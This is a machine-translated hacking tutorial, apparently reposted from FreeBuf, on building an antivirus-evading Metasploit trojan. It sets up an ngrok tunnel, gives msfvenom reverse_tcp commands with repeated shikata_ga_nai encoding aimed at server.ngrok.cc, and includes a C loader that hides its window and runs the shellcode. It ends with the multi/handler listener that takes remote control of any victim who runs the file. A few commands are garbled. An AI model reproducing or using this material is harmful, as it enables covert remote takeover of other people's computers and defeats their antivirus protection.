Disclaimer: The technology, ideas and tools involved in this article are only for the purpose of learning and communication for safety purposes. No one may use it for illegal purposes and profit purposes, otherwise the consequences will be borne by yourself!
Metasploit experiment: making a kill-free payload + remote control of any "external network" host
The implementation of this experiment needs to be split into the following three modules:
The internal network penetrates to the external network to
create a
Metasploit control client for the anti-killing Trojan backdoor
Environmental preparation
| operating system | use | IP address | Need software |
|---|---|---|---|
| Time | Make payload, attack, map port | 192.168.1.130 | Metasploit Ngrok |
| Win7 | Make payload | Omitted | VC ++ 6.0 |
| Win10 | Client computer | Any public network address | no |
Intranet penetrates to external network
First, we need to download a tool for intranet penetration to perform port mapping and forwarding.
Here I use linux64bit:
https://www.ngrok.cc/#down-client
Next, apply for self-registration on the above website, and then log in.
Then apply for a free tunnel, choose the TCP protocol, and customize the remote port. The local IP address is the IP address of Kali. The port is customized, but do not conflict. 
Here please remember the tunnel id, as well as custom remote port, kali local port
Place the downloaded client in the specified directory, cd to the directory, and run ngrok on the command line
./sunny clientid 隧道id
This completes the port mapping, which can return the data received by the external network port to the designated port of the local kali. There are many uses for intranet penetration, and the instructions are given below, which will not be repeated here.
https://ngrok.com/docs
Make a killer Trojan backdoor
First, generate a payload with msfvenom in kali
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c
In the above command, -p selects the specified payload, -e selects the specified encoder (different encoders have different anti-kill effects, and some encoders have significant anti-soft effects such as velvet), -i encoding times, -b removes extra / bad characters , Lhost is the ngrok server address you applied for, lport is a customized remote port, and -f generates the specified format.
I chose to generate an array based on the C language. Of course, you can also use the following command to get the exe Trojan directly, but the anti-killing effect will be discounted. After many tests by the author, the anti-killing effect is very powerful after repeated coding 12 times!
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f exe > haya.exe
Then copy the buf array
in the obtained shellcode. Compile the following code with VC6.0 under win7 to get the Trojan.
#include <stdio.h>
#pragmacomment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}
Metasploit control client
Cut to Kali and use Metasploit to monitor.
Set the monitoring attack module, monitoring payload, IP (Kali local), port (custom local port in ngrok), and then exp.
use exploit/multi/handler
set payloads windows/meterpreter/reverset_tcp
set lhost 192.168.1.130
set lport 12345
exploit
When the client executes the Trojan, it gets a meterpreter.
Original article: https://www.freebuf.com/sectool/136736.html
